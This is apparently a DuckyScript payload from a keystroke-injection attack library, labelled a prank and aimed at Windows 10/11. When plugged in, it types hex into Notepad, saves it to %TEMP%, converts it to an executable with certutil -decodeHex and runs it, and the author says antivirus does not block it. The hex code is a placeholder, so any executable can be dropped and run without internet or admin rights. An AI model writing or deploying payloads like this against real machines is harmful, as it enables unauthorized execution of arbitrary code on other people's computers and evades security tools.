Path: blob/master/payloads/library/prank/Pranh(ex)/payload.txt
2968 views
REM_BLOCK1##################################2# #3# Title : Pranh(ex) #4# Author : Aleff #5# Version : 1.0 #6# Category : Prank #7# Target : Windows 10/11 #8# #9##################################1011Plug-And-Play <312END_REM1314REM_BLOCK15Requirements:16- Nothing (i know, it's absurd)1718Note:19- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`20- Tested on Windows 1121- Running checked but not blocked by Avast antivirus22- Original Python code in assets/pranh(ex).py23- Hex content in assets/hexfile.txt24- exe file in assets/pranh(ex).exe25END_REM2627REM Here you should put your HEX code28DEFINE #HEX_CODE example2930EXTENSION PASSIVE_WINDOWS_DETECT31REM VERSION 1.132REM AUTHOR: Korben3334REM_BLOCK DOCUMENTATION35Windows fully passive OS Detection and passive Detect Ready36Includes its own passive detect ready.37Does not require additional extensions.3839USAGE:40Extension runs inline (here)41Place at beginning of payload (besides ATTACKMODE) to act as dynamic42boot delay43$_OS will be set to WINDOWS or NOT_WINDOWS44See end of payload for usage within payload45END_REM4647REM CONFIGURATION:48DEFINE #MAX_WAIT 15049DEFINE #CHECK_INTERVAL 2050DEFINE #WINDOWS_HOST_REQUEST_COUNT 251DEFINE #NOT_WINDOWS 75253$_OS = #NOT_WINDOWS5455VAR $MAX_TRIES = #MAX_WAIT56WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))57DELAY #CHECK_INTERVAL58$MAX_TRIES = ($MAX_TRIES - 1)59END_WHILE60IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN61$_OS = WINDOWS62END_IF6364REM_BLOCK EXAMPLE USAGE AFTER EXTENSION65IF ($_OS == WINDOWS) THEN66STRING HELLO WINDOWS!67ELSE68STRING HELLO WORLD!69END_IF70END_REM71END_EXTENSION7273GUI r74DELAY 100075STRINGLN notepad.exe76DELAY 200077STRING #HEX_CODE78DELAY 200079ALT f80DELAY 100081STRING S82DELAY 100083STRINGLN "%TEMP%\pranhex.hex"84DELAY 100085ENTER86DELAY 100087ALT F488DELAY 200089GUI r90DELAY 50091STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"92DELAY 100093ENTER94DELAY 100095GUI r96DELAY 25097STRINGLN "%TEMP%\pranhex.exe"98ENTER99100101